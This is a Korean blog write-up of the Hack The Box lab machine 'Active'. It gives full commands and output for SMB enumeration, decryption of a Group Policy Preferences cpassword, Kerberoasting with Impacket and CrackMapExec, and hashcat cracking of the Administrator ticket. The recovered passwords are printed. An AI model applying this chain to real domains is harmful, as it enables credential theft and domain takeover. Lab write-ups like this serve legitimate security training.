정보보안

Active 본문

HTB/Windows

Active

haru0909 2023. 9. 17. 15:37

PWNED : 총 4시간

 

1.NMAP

$ nmap --script vuln -oA vuln -T4 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 11:57 KST
Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.10% done; ETC: 11:59 (0:00:04 remaining)
Nmap scan report for 10.129.69.12
Host is up (0.084s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 136.88 seconds
nmap -sV -sC --top-ports 2000 --max-retries 2 -T5 -Pn -n -oA topports 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 12:13 KST
Warning: 10.129.69.12 giving up on port because retransmission cap hit (2).
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 63.16% done; ETC: 12:14 (0:00:09 remaining)
Nmap scan report for 10.129.69.12
Host is up (0.082s latency).
Not shown: 1743 closed tcp ports (conn-refused), 238 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-17 03:13:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -9s
| smb2-time:
|   date: 2023-09-17T03:14:40
|_  start_date: 2023-09-17T02:26:42
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
//같은 명령이지만 이렇게도 할 수 있음을 배움.
$ nmap -Pn -n --open -p 53,88,135,138,389,445,3268 -sV -sC -oA tcpdetailed 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 12:26 KST
Nmap scan report for 10.129.69.12
Host is up (0.096s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-17 03:26:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -10s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-09-17T03:26:11
|_  start_date: 2023-09-17T02:26:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds

 

2. SMB Enum

$ smbmap -H 10.129.69.12
[+] IP: 10.129.69.12:445        Name: 10.129.69.12

        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share
        Users                                                   NO ACCESS
$ smbclient -N //10.129.69.12/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  active.htb                          D        0  Sat Jul 21 19:37:44 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 19:37:44 2018
  Policies                            D        0  Sat Jul 21 19:37:44 2018
  scripts                             D        0  Thu Jul 19 03:48:57 2018

                10459647 blocks of size 4096. 5203534 blocks available

smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 19:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 19:37:44 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  GPT.INI                             A       23  Thu Jul 19 05:46:06 2018
  Group Policy                        D        0  Sat Jul 21 19:37:44 2018
  MACHINE                             D        0  Sat Jul 21 19:37:44 2018
  USER                                D        0  Thu Jul 19 03:49:12 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  Groups                              D        0  Sat Jul 21 19:37:44 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 05:46:06 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 4.5 KiloBytes/sec)


$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

 

GPP Decrypt

cpassword를 decrypt해야 해서 구글링했더니 아래와 같은 github을 발견함.
https://github.com/t0thkr1s/gpp-decrypt

그룹 정책 기본 설정 XML 파일을 구문 분석하여 사용자 이름을 추출하고 cpassword 속성을 해독하는 도구.

$ git clone https://github.com/t0thkr1s/gpp-decrypt 
$ cd gpp-decrypt $ sudo python3 setup.py install 
$ pip3 install pycryptodome // 중요, 에러나서 한참 해맴 
// 안 될 경우 pip3 uninstall pycrypto, crypto 후 pycryto만 다시 설치

$ python3 gpp-decrypt/gpp-decrypt.py -f Groups.xml

_ _ _ _ __ _/ / _ __ __ _ __ ___ / /
/ _ `/ / _ \ / _ /// _ / / -)/ / / _/ / // / / _ / __/
\, / / ./ / ./ _,_/ \/ _/ // _, / / ./\/
// // // // /_/

[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18

패스워드 평문화까지 완료.

 

Kerberosting

"SPN(서비스 사용자 이름)은 서비스 인스턴스의 고유 식별자입니다.

SPN은 Kerberos 인증에서 서비스 인스턴스를 서비스 로그온 계정과 연결하는 데 사용됩니다. " - MSDN
유효한 도메인 사용자는 모든 도메인 서비스에 대해 ST(kerberos 티켓)를 요청할 수 있습니다.

티켓이 수신되면 티켓에서 오프라인으로 비밀번호 크래킹을 수행하여 서비스를 실행 중인 모든 사용자의 비밀번호를 해독할 수 있습니다.

 

1. Impacket Suite의 GetUserSPN을 사용한 Kerberosting

```bash
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.69.12 -request

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 04:06:40.351723  2023-09-17 11:27:43.687337

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cea499929257df6c2409286fa1b312e0$041ca8cfc3fc0f9be317853c6339d05e15f374edc63e9783085d4a84708f1e21c5883e77a1a0e03da83510288f5901c2690836e81fb1dfcccdf70aef68eef65726a41048a61c0dd945c5ff20dba2dbac92e8d328534f30c1271e8ad5b3b9c5577b04b0c7e9e2fce2b7491a7e37672ee37d6cfc43f9d8ffb16e8871b1d19e7fe79369254bed9d2ee0911ddb13a2107e4de4b4eb75d5b55ae25db0b2c4b60f7784bf420edb948d4c2d4630548c954eeeac335d4a2ca4e934823c9c1e18ffcabfa6e94e75a318658a4c5248c783891a6c64b6638543ef871471ad7bfcbaa729c025b5b70add22b320e10a8d5294518db5b5a48631867523aea65cd363487779d4f8ad038d595d4269daeb8b027fda789684322970b4f181db1322cdaf89bbc552c75d9a2bcbfbe8f341194f90275c2bc7c784024eeaa7b988c002a29b8de60e909f670a2e148ba083eb4aca6d20adbb3a665b63568c3b5af17d27bea3c142ef8dd2625a4036c8eae957ae831a0d9c7fe6dc8ade3740a6cacf69b476299a63bce65991a0ec790613da370b06d8720619bf3df5b54629179f0661ac782132e018c6c8855f22ae46e0a5d2a6454077a1ea09a9cbad3803b341ec6b93da3ee6311cf3595c36474dc2ef7429a69ca118c36a705b44d8d3fe51730e25fde633736c895f3ef58e6d827c4ca13850ac31b48af70f783f5211a30eb19e7537e4e91b31851877c9b7763a7863ee33dc76fb3164448e3ef08e7afb269798f214cef8c62f7174cef526ae0c7b7cf2d63a0c1245574bd1295812dfa3bb787198193ca0f1a99e58fe35d416edae1db0e63d967835a3c2939df7213e215e4ad4a8ec3e8db9528a0db7e9578df40cb597cb6537abd4842ab891b7fe37521cb91186ca0c0632a4511cc62e80c9983ef9104eb20e82af33ee79ac3c8111a6f753e0aefe927ca4fb9a513b57d6f2fa74890b7fe803558dcbaf093371c5ec6dedb65c86c3d8dca9a4ee827ef737a3b22e4523da76277689bfe96769ee9f4e869afbc7749d4412c3d6e61c116836ad9c92d864df9e2a452dd272ec8eb3cc5c39a33fca9e64f5e159b62be139ff60736947165d15d2b96fe1c07882fc0449ef7b7ff7d71a50f0b6c75c3f5a042604f7057b544618b1b64366b21e85f275d251c9d69bd9eb61bb561de1d4692ad6208a217e7383c72083e7e87fde52f83b66eb4ffa6b592a790b19446d06b30762a0e61e485a350cacd460a2f1762d776140e056a82ea9becba6

 

2. CrackMapExec 모듈을 사용한 Kerberosting
$ crackmapexec ldap [TARGET IP] -u 'username' -p 'password' --kdcHost [TARGET IP] --kerberoast output.txt

$ crackmapexec ldap 10.129.69.12  -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kdcHost 10.129.69.12 --kerberoast output.tx
SMB         10.129.69.12    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP        10.129.69.12    389    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP        10.129.69.12    389    DC               [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP        10.129.69.12    389    DC               sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-19 04:06:40.351723 lastLogon:2023-09-17 11:27:43.687337
LDAP        10.129.69.12    389    DC               $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9415bb9ddfaf220c1df94b2838de058$95469269154fa202dce530ef37a275e1ccde88850b9a42b038bc9f1038ffe033f00d5e957d70dab77622aad76c63b899c347d85433db40de8a8555a59405c825abde84735564e31e08237e8dbfd6504e1d667899e1330dc958346f19eae3331622dca52a99cdd12816c1221683eb057dde3d61eb5027115d10cc786804ebd85937859fea0a27d97f196e412723f83abc5acde9ed89488aaf9b9260f046d18c71eb582a8c5fc38cbbbcd94b4150f8ea33756f50d6cd53da4ce826cd5f02e8505c08581944716668430b95a840403f35007be6fc68873bf8198c9f3427f6c2c4c6e98cddfd59f6600d8c7a565b8a09c768fb7e43b41fccc555306cff272357a05d2191a71725c614dfaf292a2938e38ec040271b925b8ff270f9e55d87dd18901edfe5017d48208b4675d81bd640eba433d8de8f84770a332fd2af4415d783cc291db3529438fd75f51b06c04bdea362a16b73f4c959f1ffe04375de58cee6f8c6029bddfe022d098f6216f5ed2ef29f62d1f54b4fd9fa2bf64c262138e9c45c3c430a19cdb627b8de66562d34868965ed4ae6a1e388f69c6d13ad1d1dc4e60f0a69061cfaefeb15c257c88be8173ccc996e9f3160d4be077ce80db175c7dc1427cac552d3b6fcde811f077311c9d8f607db205bda3e30c23c1956ad1b1f2faa3168486aa1bf133490745f939204567065392edfe676862cd237c69b0fa6c7b7f0a504f15cb5f076a8c48f1b9e26b4b3c2585c997683873993ba443d35850ae87972b42549aa574321b8211b2ec38233e3d0562d957a4b3f1ca51813563311b5bda8e5b95ea5a6a17f1d79465636d1443676584e295718f8a4a4b481a9380807c1541afbb4fc36e59560474dbb47936d65bdfdeb224bdc44636cf016305a56dac8ae93861a0bc7f0ad31ca7ed9e3dd59938899b9cda9894beabbdafa0e53f1925b38ce9fb1983ea9f30abe6ca15b7878c0be31e6e45a68569734b0e0cf69690209f7a8822ea797836b748e7c62c863f73894ecf3207f67e45f52881112f2ad429f7d4f3dbf95f009502567c685063d07c0ac663877b134c81d9eacec581e31a7f3bb434b56157b749d03a4921f514a4aed83979c0eeddd3945e2e470fdc4def6534159f90546550b0afcff8394a7cb0c9b154ce9cc2cdb94d163bf23a6868fcc56b15ca9dd2c3cec43c153a59c9c2dd0f1506bcbf8e517ec64514b538801184b955794acf699e0e74d0a70537e444f5700f277aaf2170aa7c255a2

 

HASHCAT

krb5tgs는 13100번이다.

$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt -o admin.txt --quiet
$ cat admin.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9415bb9ddfaf220c1df94b2838de058$95469269154fa202dce530ef37a275e1ccde88850b9a42b038bc9f1038ffe033f00d5e957d70dab77622aad76c63b899c347d85433db40de8a8555a59405c825abde84735564e31e08237e8dbfd6504e1d667899e1330dc958346f19eae3331622dca52a99cdd12816c1221683eb057dde3d61eb5027115d10cc786804ebd85937859fea0a27d97f196e412723f83abc5acde9ed89488aaf9b9260f046d18c71eb582a8c5fc38cbbbcd94b4150f8ea33756f50d6cd53da4ce826cd5f02e8505c08581944716668430b95a840403f35007be6fc68873bf8198c9f3427f6c2c4c6e98cddfd59f6600d8c7a565b8a09c768fb7e43b41fccc555306cff272357a05d2191a71725c614dfaf292a2938e38ec040271b925b8ff270f9e55d87dd18901edfe5017d48208b4675d81bd640eba433d8de8f84770a332fd2af4415d783cc291db3529438fd75f51b06c04bdea362a16b73f4c959f1ffe04375de58cee6f8c6029bddfe022d098f6216f5ed2ef29f62d1f54b4fd9fa2bf64c262138e9c45c3c430a19cdb627b8de66562d34868965ed4ae6a1e388f69c6d13ad1d1dc4e60f0a69061cfaefeb15c257c88be8173ccc996e9f3160d4be077ce80db175c7dc1427cac552d3b6fcde811f077311c9d8f607db205bda3e30c23c1956ad1b1f2faa3168486aa1bf133490745f939204567065392edfe676862cd237c69b0fa6c7b7f0a504f15cb5f076a8c48f1b9e26b4b3c2585c997683873993ba443d35850ae87972b42549aa574321b8211b2ec38233e3d0562d957a4b3f1ca51813563311b5bda8e5b95ea5a6a17f1d79465636d1443676584e295718f8a4a4b481a9380807c1541afbb4fc36e59560474dbb47936d65bdfdeb224bdc44636cf016305a56dac8ae93861a0bc7f0ad31ca7ed9e3dd59938899b9cda9894beabbdafa0e53f1925b38ce9fb1983ea9f30abe6ca15b7878c0be31e6e45a68569734b0e0cf69690209f7a8822ea797836b748e7c62c863f73894ecf3207f67e45f52881112f2ad429f7d4f3dbf95f009502567c685063d07c0ac663877b134c81d9eacec581e31a7f3bb434b56157b749d03a4921f514a4aed83979c0eeddd3945e2e470fdc4def6534159f90546550b0afcff8394a7cb0c9b154ce9cc2cdb94d163bf23a6868fcc56b15ca9dd2c3cec43c153a59c9c2dd0f1506bcbf8e517ec64514b538801184b955794acf699e0e74d0a70537e444f5700f277aaf2170aa7c255a2:Ticketmaster1968

 

ADMIN 접속

$ smbclient //10.129.69.12/Users$ -U administrator
Password for [WORKGROUP\administrator]:
Try "help" to get a list of possible commands.

smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

smb: \SVC_TGS\> get Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as Desktop\user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

'HTB > Windows' 카테고리의 다른 글

CASCADE  (0) 2023.12.12
Monteverde  (0) 2023.09.17
Granny  (0) 2023.08.27
Legacy  (0) 2023.08.22